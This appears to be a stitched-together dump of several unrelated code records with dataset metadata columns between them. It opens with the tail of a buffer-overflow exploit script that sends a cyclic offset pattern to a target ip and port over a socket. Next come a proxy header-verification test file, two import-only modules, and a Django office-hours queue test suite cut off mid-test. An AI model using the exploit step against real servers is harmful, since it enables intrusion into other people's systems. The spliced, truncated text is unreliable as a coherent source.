Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj"
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))
s.send((offset))
s.close()
except:
print("Error connecting to server")
sys.exit()
| 108.8
| 1,861
| 0.949449
| 51
| 2,176
| 40.45098
| 0.784314
| 0.011634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.29948
| 0.027114
| 2,176
| 19
| 1,862
| 114.526316
| 0.675012
| 0.032629
| 0
| 0
| 0
| 0
| 0.898241
| 0.879696
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0.083333
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c1375c53bef4c1b457d615f57061a389efe4123
| 10,123
|
py
|
Python
|
test/autests/gold_tests/field_verification/not_nocase.test.py
|
keesspoelstra/proxy-verifier
|
1b219d68783a453c2271108bbea5a9529d018498
|
[
"Apache-2.0"
] | 31
|
2020-03-03T04:37:36.000Z
|
2022-03-31T15:43:07.000Z
|
test/autests/gold_tests/field_verification/not_nocase.test.py
|
keesspoelstra/proxy-verifier
|
1b219d68783a453c2271108bbea5a9529d018498
|
[
"Apache-2.0"
] | 33
|
2020-02-11T19:34:12.000Z
|
2021-06-21T20:07:32.000Z
|
test/autests/gold_tests/field_verification/not_nocase.test.py
|
keesspoelstra/proxy-verifier
|
1b219d68783a453c2271108bbea5a9529d018498
|
[
"Apache-2.0"
] | 13
|
2020-02-07T20:04:02.000Z
|
2021-12-21T21:26:40.000Z
|
'''
Verify correct field and URL verification behavior
for not and nocase modifiers.
'''
# @file
#
# Copyright 2021, Verizon Media
# SPDX-License-Identifier: Apache-2.0
#
Test.Summary = '''
Verify correct field and URL verification behavior for
equals, absent, present, contains, prefix, and suffix
with not, nocase, and both not and nocase modifiers
'''
#
# Test 1: Verify field verification in a YAML replay file.
# Each combinaton of test type, not/as, and case/nocase, and positive/negative result
# are tested for client, and a mixture for server
#
r = Test.AddTestRun("Verify 'not' and 'nocase' directives work for a single HTTP transaction")
client = r.AddClientProcess("client1", "replay_files/not_nocase.yaml")
server = r.AddServerProcess("server1", "replay_files/not_nocase.yaml")
proxy = r.AddProxyProcess(
"proxy1",
listen_port=client.Variables.http_port,
server_port=server.Variables.http_port)
server.Streams.stdout += Testers.ContainsExpression(
'Not Equals Success: Different. Key: "5", Field Name: "host", Correct Value: "le.on", Actual Value: "example.one"',
'Validation should be happy that "le.on" is not equal to "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Presence Success: Absent. Key: "5", Field Name: "x-test-absent"',
'Validation should be happy that "X-Test-Absent" has no value.')
server.Streams.stdout += Testers.ContainsExpression(
'Not Absence Success: Present. Key: "5", Field Name: "x-test-present", Value: "It\'s there"',
'Validation should be happy that "X-Test-Present" has a value.')
server.Streams.stdout += Testers.ContainsExpression(
'Not Contains Success: Not Found. Key: "5", Field Name: "host", Required Value: "leo", Actual Value: "example.one"',
'Validation should be happy that "leo" is not contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Prefix Success: Not Found. Key: "5", Field Name: "x-test-request", Required Value: "equ", Actual Value: "RequestData"',
'Validation should be happy that "equ" does not prefix "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Suffix Success: Not Found. Key: "5", Field Name: "x-test-present", Required Value: "It\'s", Actual Value: "It\'s there"',
'Validation should be happy that "It\'s" does not suffix "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Equals Success: Key: "5", Field Name: "host", Required Value: "EXAMpLE.ONE", Value: "example.one"',
'Validation should be happy that "EXAMpLE.ONE" nocase equals "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Contains Success: Key: "5", Field Name: "host", Required Value: "Le.ON", Value: "example.one"',
'Validation should be happy that "Le.ON" is nocase contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Prefix Success: Key: "5", Field Name: "x-test-request", Required Value: "rEQ", Value: "RequestData"',
'Validation should be happy that "rEQ" nocase prefixes "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Suffix Success: Key: "5", Field Name: "x-test-present", Required Value: "heRe", Value: "It\'s there"',
'Validation should be happy that "heRe" nocase suffixes "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Equals Success: Different. Key: "5", Field Name: "host", Correct Value: "example.ON", Actual Value: "example.one"',
'Validation should be happy that "le.on" does not nocase equal "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Contains Success: Not Found. Key: "5", Field Name: "host", Required Value: "U", Actual Value: "example.one"',
'Validation should be happy that "leo" is not nocase contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Prefix Success: Not Found. Key: "5", Field Name: "x-test-request", Required Value: "EQU", Actual Value: "RequestData"',
'Validation should be happy that "equ" does not nocase prefix "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Suffix Success: Not Found. Key: "5", Field Name: "x-test-present", Required Value: "hre", Actual Value: "It\'s there"',
'Validation should be happy that "hre" does not nocase suffix "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Equals Violation: Key: "5", Field Name: "host", Value: "example.one"',
'Validation should complain that "example.on" equals "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Presence Violation: Key: "5", Field Name: "x-test-present", Value: "It\'s there"',
'Validation should complain that "X-Test-Present" has a value.')
server.Streams.stdout += Testers.ContainsExpression(
'Not Absence Violation: Key: "5", Field Name: "x-test-absent"',
'Validation should complain that "X-Test-Absent" has no value.')
server.Streams.stdout += Testers.ContainsExpression(
'Not Contains Violation: Key: "5", Field Name: "host", Required Value: "le.on", Value: "example.one"',
'Validation should complain that "le.on" is contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Prefix Violation: Key: "5", Field Name: "x-test-request", Required Value: "Req", Value: "RequestData"',
'Validation should complain that "Req" prefixes "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'Not Suffix Violation: Key: "5", Field Name: "x-test-present", Required Value: "there", Value: "It\'s there"',
'Validation should complain that "there" suffixes "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Equals Violation: Different. Key: "5", Field Name: "host", Correct Value: "EXAMPLE.ON", Actual Value: "example.one"',
'Validation should complain that "EXAMPL.ON" does not nocase equal "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Contains Violation: Not Found. Key: "5", Field Name: "host", Required Value: "LE..On", Actual Value: "example.one"',
'Validation should complain that "LE..On" is not nocase contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Prefix Violation: Not Found. Key: "5", Field Name: "x-test-request", Required Value: "-TE", Actual Value: "RequestData"',
'Validation should complain that "-TE" does not nocase prefix "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'No Case Suffix Violation: Not Found. Key: "5", Field Name: "x-test-present", Required Value: "THER", Actual Value: "It\'s there"',
'Validation should complain that "THER" does not nocase suffix "It\'s there".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Equals Violation: Key: "5", Field Name: "host", Required Value: "Example.one", Value: "example.one"',
'Validation should complain that "Example.one" nocase equals "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Contains Violation: Key: "5", Field Name: "host", Required Value: "le.oN", Value: "example.one"',
'Validation should complain that "le.oN" is nocase contained in "example.one".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Prefix Violation: Key: "5", Field Name: "x-test-request", Required Value: "req", Value: "RequestData"',
'Validation should complain that "req" nocase prefixes "RequestData".')
server.Streams.stdout += Testers.ContainsExpression(
'Not No Case Suffix Violation: Key: "5", Field Name: "x-test-present", Required Value: "eRE", Value: "It\'s there"',
'Validation should complain that "eRE" nocase suffixes "It\'s there".')
server.Streams.stdout = Testers.ContainsExpression(
'Not No Case Contains Violation: Key: "5", URI Part: "path", Required Value: "iG/S", Value: "/config/settings.yaml"',
'Validation should complain that "iG/S" is nocase contained in the path.')
client.Streams.stdout += Testers.ContainsExpression(
'Not Equals Success: Different. Key: "5", Field Name: "content-type", Correct Value: "text", Actual Value: "text/html"',
'Validation should be happy that "text" does not equal "text/html".')
client.Streams.stdout += Testers.ContainsExpression(
'Not Presence Violation: Key: "5", Field Name: "set-cookie", Value: "ABCD"',
'Validation should complain that "set-cookie" is present.')
client.Streams.stdout += Testers.ContainsExpression(
'Not Absence Violation: Key: "5", Field Name: "fake-cookie"',
'Validation should complain that "fake-cookie" is absent.')
client.Streams.stdout += Testers.ContainsExpression(
'Not No Case Contains Violation: Key: "5", Field Name: "content-type", Required Value: "Tex", Value: "text/html"',
'Validation should complain that "Tex" is nocase contained in "text/html".')
client.Streams.stdout += Testers.ContainsExpression(
'Not No Case Prefix Success: Absent. Key: "5", Field Name: "fake-cookie", Required Value: "B"',
'Validation should be happy that "B" does not nocase prefix a nonexistent header.')
client.Streams.stdout += Testers.ContainsExpression(
'No Case Suffix Success: Key: "5", Field Name: "content-type", Required Value: "L", Value: "text/html"',
'Validation should be happy that "L" nocase suffixes "text/html".')
client.Streams.stdout += Testers.ContainsExpression(
'Not Prefix Success: Not Found. Key: "5", Field Name: "multiple", Required Values: "Abc" "DEF", Received Values: "abc" "DEF"',
'Validation should be happy that "Abc" does not prefix "abc", even though "DEF" prefixes "DEF".')
client.Streams.stdout += Testers.ContainsExpression(
'Not No Case Equals Violation: Key: "5", Field Name: "multiple", Required Values: "Abc" "DEF", Values: "abc" "DEF"',
'Validation should complain that each required value nocase equals the corresponding received value.')
client.ReturnCode = 1
server.ReturnCode = 1
| 53.560847
| 136
| 0.712042
| 1,341
| 10,123
| 5.369128
| 0.111111
| 0.066806
| 0.102778
| 0.195278
| 0.838889
| 0.813056
| 0.795417
| 0.785139
| 0.698611
| 0.636389
| 0
| 0.005678
| 0.147486
| 10,123
| 188
| 137
| 53.845745
| 0.828621
| 0.033784
| 0
| 0.288
| 0
| 0.184
| 0.690086
| 0.008091
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c4aa9eedb3b1c6e2e7a3e567eb7ad686eaa3237
| 95
|
py
|
Python
|
src/learndash/api_resources/__init__.py
|
MarkMacDon/learndash-python
|
a3fbfc45567a524b80c732d735f2ae101119f2e4
|
[
"MIT"
] | null | null | null |
src/learndash/api_resources/__init__.py
|
MarkMacDon/learndash-python
|
a3fbfc45567a524b80c732d735f2ae101119f2e4
|
[
"MIT"
] | 1
|
2021-05-06T19:01:24.000Z
|
2021-05-06T19:01:24.000Z
|
src/learndash/api_resources/__init__.py
|
MarkMacDon/learndash-python
|
a3fbfc45567a524b80c732d735f2ae101119f2e4
|
[
"MIT"
] | 2
|
2021-05-05T22:45:04.000Z
|
2021-07-24T08:47:02.000Z
|
from learndash.api_resources.course import Course
from learndash.api_resources.user import User
| 47.5
| 49
| 0.884211
| 14
| 95
| 5.857143
| 0.5
| 0.317073
| 0.390244
| 0.609756
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073684
| 95
| 2
| 50
| 47.5
| 0.931818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1c8bd63bbcf9973362a7a60fdb41739b53e0c42c
| 119
|
py
|
Python
|
light_bulb/__init__.py
|
renorram/opengl_lamp
|
fe43ebfaea688f19cc05fe791fe9f15d7b283a7b
|
[
"MIT"
] | null | null | null |
light_bulb/__init__.py
|
renorram/opengl_lamp
|
fe43ebfaea688f19cc05fe791fe9f15d7b283a7b
|
[
"MIT"
] | null | null | null |
light_bulb/__init__.py
|
renorram/opengl_lamp
|
fe43ebfaea688f19cc05fe791fe9f15d7b283a7b
|
[
"MIT"
] | null | null | null |
from light_bulb.camera import Camera
from light_bulb.controls import Controls
from light_bulb.lighting import Lighting
| 29.75
| 40
| 0.87395
| 18
| 119
| 5.611111
| 0.388889
| 0.267327
| 0.386139
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10084
| 119
| 3
| 41
| 39.666667
| 0.943925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1c90dc783a4f274931b624f5ef23dfb91babaf94
| 28,170
|
py
|
Python
|
ohqueue/tests.py
|
mike2151/Online-OH-queue
|
04544a55bf57b5d93e0fcf2764e6ee6511d6c2ed
|
[
"MIT"
] | 6
|
2019-05-17T02:29:12.000Z
|
2020-09-28T01:14:47.000Z
|
ohqueue/tests.py
|
mike2151/Online-OH-queue
|
04544a55bf57b5d93e0fcf2764e6ee6511d6c2ed
|
[
"MIT"
] | 33
|
2018-12-16T18:58:11.000Z
|
2021-06-10T21:04:11.000Z
|
ohqueue/tests.py
|
mike2151/Online-OH-queue
|
04544a55bf57b5d93e0fcf2764e6ee6511d6c2ed
|
[
"MIT"
] | 3
|
2019-01-10T15:55:18.000Z
|
2021-02-25T15:54:36.000Z
|
from django.test import TestCase
from .models import OHQueue
from freezegun import freeze_time
from users.models import StudentUser
import datetime
from rest_framework.test import APIClient
from rest_framework.authtoken.models import Token
import json
import string, random
class OHCreation(TestCase):
def setUp(self):
self.queue = OHQueue.objects.create(name="main", monday_times="4:00pm-6:00pm")
self.student_user = StudentUser.objects.create(username="test", email="test@upenn.edu", first_name="tester",
last_name="smith", password="testing123")
self.student_user.set_password("testing123")
self.student_user.is_active = True
self.student_user.save()
@freeze_time("2018-12-31 21:00:01")
def test_ohqueue_created(self):
self.assertEquals("main", self.queue.name)
self.assertEquals("4:00pm-6:00pm", self.queue.monday_times)
self.assertTrue(self.queue.isQueueActive(self.student_user))
@freeze_time("2018-12-31 16:00:01")
def test_is_queue_inactive(self):
self.assertFalse(self.queue.isQueueActive(self.student_user))
@freeze_time("2018-12-31 21:00:01")
def test_update_time(self):
self.assertTrue(self.queue.isQueueActive(self.student_user))
freezer = freeze_time("2018-12-31 16:00:01")
freezer.start()
self.queue.updateTime()
self.assertFalse(self.queue.is_in_time)
# These tests assume New York Time zone!
class OHQuestions(TestCase):
def setUp(self):
self.client = APIClient()
self.queue = OHQueue.objects.create(name="main", monday_times="4:00pm-6:00pm")
# monday time at queue opening time
freezer = freeze_time("2018-12-31 21:00:01")
freezer.start()
self.student_user = StudentUser.objects.create(username="test", email="test@upenn.edu", first_name="tester",
last_name="smith", password="testing123")
self.student_user.set_password("testing123")
self.student_user.is_active = True
self.student_user.save()
self.student_user_two = StudentUser.objects.create(username="test2", email="test2@upenn.edu", first_name="tester2",
last_name="smith", password="testing123")
self.student_user_two.set_password("testing123")
self.student_user_two.is_active = True
self.student_user_two.save()
self.ta_user = StudentUser.objects.create(username="ta", email="ta@upenn.edu", first_name="ta",
last_name="smith", password="testing123")
self.ta_user.set_password("testing123")
self.ta_user.is_active = True
self.ta_user.is_ta = True
self.ta_user.save()
def generate_header(self, user):
token, _ = Token.objects.get_or_create(user=user)
self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
def test_queue_is_open(self):
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(200, response.status_code)
self.assertEquals(1, len(json.loads(response.content)))
def test_is_queue_open_unauthenticated(self):
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(401, response.status_code)
def test_queue_is_closed(self):
freezer = freeze_time("2018-12-31 16:00:01")
freezer.start()
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(200, response.status_code)
self.assertEquals(0, len(json.loads(response.content)))
# ta_list end point
def test_queue_is_open_ta(self):
self.generate_header(self.ta_user)
response = self.client.get('/api/v1/queue/list_ta/')
self.assertEquals(200, response.status_code)
self.assertEquals(1, len(json.loads(response.content)))
def test_is_queue_open_unauthenticated_ta(self):
response = self.client.get('/api/v1/queue/list_ta/')
self.assertEquals(401, response.status_code)
def test_is_queue_open_student_ta(self):
response = self.client.get('/api/v1/queue/list_ta/')
self.assertEquals(401, response.status_code)
def test_queue_is_not_closed_ta(self):
freezer = freeze_time("2018-12-31 16:00:01")
freezer.start()
self.generate_header(self.ta_user)
response = self.client.get('/api/v1/queue/list_ta/')
self.assertEquals(200, response.status_code)
self.assertEquals(1, len(json.loads(response.content)))
# extend open tests
def test_can_extend_ohqueue(self):
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/open/', {"queue": "main"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
def test_student_cannot_extend_ohqueue(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/open/', {"queue": "main"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
def test_unauthenticated_cannot_extend_ohqueue(self):
response = self.client.post('/api/v1/queue/open/', {"queue": "main"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
def test_closed_then_extended_open(self):
freezer = freeze_time("2018-12-31 16:00:01")
freezer.start()
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(0, len(json.loads(response.content)))
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/open/', {"queue": "main"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(1, len(json.loads(response.content)))
# close early tests
def test_can_close_ohqueue(self):
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
def test_student_cannot_close_ohqueue(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
def test_unauthenticated_cannot_close_ohqueue(self):
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
def test_open_then_closed(self):
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(1, len(json.loads(response.content)))
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(0, len(json.loads(response.content)))
# ask questions
def test_anon_cant_ask_question(self):
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertIn("Authentication credentials were not provided.", json.loads(response.content)["detail"])
def test_can_ask_question(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
def test_queue_is_open_if_student_still_has_question(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/queue/close/', {"queue": "main"}, format="json")
self.generate_header(self.student_user)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(1, len(json.loads(response.content)))
self.generate_header(self.student_user_two)
response = self.client.get('/api/v1/queue/list/')
self.assertEquals(0, len(json.loads(response.content)))
def test_student_cannot_ask_two_question(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(400, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
def test_student_cannot_ask_two_questions_in_dif_queues(self):
queue_two = OHQueue.objects.create(name="second", monday_times="4:00pm-6:00pm")
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()) + len(queue_two.questions.values()))
response = self.client.post('/api/v1/queue/second/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(400, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()) + len(queue_two.questions.values()))
def test_two_students_can_ask_two_questions_same_queue(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(2, len(self.queue.questions.values()))
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
self.assertEquals("my question 2", self.queue.questions.values()[1]["description"])
def test_two_students_can_ask_two_questions_different_queue(self):
queue_two = OHQueue.objects.create(name="second", monday_times="4:00pm-6:00pm")
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(self.queue.questions.values()))
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/queue/second/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(201, response.status_code)
self.assertEquals(1, len(queue_two.questions.values()))
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
self.assertEquals("my question 2", queue_two.questions.values()[0]["description"])
# answering questions
def test_ta_can_answer_questions(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id_one = (self.queue.questions.values()[0]["id"])
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": question_id_one}, format="json")
self.assertEquals(200, response.status_code)
self.assertTrue(json.loads(response.content)["success"])
self.assertEquals(0, len(self.queue.questions.values()))
def test_anon_cannot_answer_questions(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.client.credentials()
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": 1}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_student_cannot_answer_questions(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": 1}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_ta_answer_queue_of_two_questions(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question 2"}, format="json")
question_id_one = (self.queue.questions.values()[0]["id"])
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": question_id_one}, format="json")
self.assertEquals("my question 2", self.queue.questions.values()[0]["description"])
self.assertEquals(1, len(self.queue.questions.values()))
question_id_two = (self.queue.questions.values()[0]["id"])
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": question_id_two}, format="json")
self.assertEquals(0, len(self.queue.questions.values()))
def test_ta_cannot_answer_not_valid_queue(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "random", "question_id": 1}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_ta_cannot_answer_not_valid_question_id(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": 15}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
# edit questions
def test_can_edit_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
question_id = str(self.queue.questions.values()[0]["id"])
response = self.client.put('/api/v1/queue/question/' + question_id + '/edit/',
{"description": "new question"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.assertEquals("new question", self.queue.questions.values()[0]["description"])
def test_anon_cannot_edit_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
question_id = str(self.queue.questions.values()[0]["id"])
self.client.credentials()
response = self.client.put('/api/v1/queue/question/' + question_id +'/edit/', {"description": "new question"}, format="json")
self.assertTrue(401, response.status_code)
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
def test_other_student_cannot_edit(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
question_id = str(self.queue.questions.values()[0]["id"])
self.generate_header(self.student_user_two)
response = self.client.put('/api/v1/queue/question/' + question_id + '/edit/', {"description": "new question"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
def test_edit_non_existent_question(self):
self.generate_header(self.student_user)
response = self.client.put('/api/v1/queue/question/15/edit/', {"description": "new question"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
# delete questions
def test_user_can_delete_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.assertEquals(0, len(self.queue.questions.values()))
def test_ta_can_delete_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.assertEquals(0, len(self.queue.questions.values()))
def test_anon_cannot_delete_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
self.client.credentials()
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_other_user_cannot_delete_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_delete_with_multiple_questions(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.generate_header(self.student_user_two)
